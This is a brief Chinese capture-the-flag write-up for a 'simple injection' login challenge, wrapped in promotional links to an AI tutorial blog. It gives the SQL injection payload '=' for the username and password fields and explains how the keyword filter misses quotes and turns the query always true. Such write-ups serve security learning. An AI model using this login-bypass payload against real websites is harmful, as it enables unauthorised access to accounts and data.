实验吧 登陆一下好吗 简单注入 By Assassin

分享一下我老师大神的人工智能教程！零基础，通俗易懂！http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识，造福人民，实现我们中华民族伟大复兴！

                       

题目想法挺简单的，是时候学习一下注入的套路了，真的要不简单的也想不到。

发现* / select  union or 都被过滤了，一开始想的太复杂了，以为是个什么waf过滤什么的，但是看了pcat前辈的WP发现真的很基础吧。

但是and ‘什么的都没有过滤！

payload真的简单到淫荡，看一下就是这样的

    admin-> ‘=’   
    password-> ‘=’   

真是醉了，为什么呢，类似这样的语句
$sql = “select user from flag where user=’\$_POST[‘user’]’  and password=’\$_POST[‘password’]’”;

如果我们按照上面输入就成了
$sql = “select user from flag where user=’‘=’’  and password=’‘=’‘”;

user=”返回的是NULL=”也是符合条件的，最后就是

$sql = “select user from flag where 1 and 1”;

还是需要多实验啊~

           

给我老师的人工智能教程打call！http://blog.csdn.net/jiangjunshow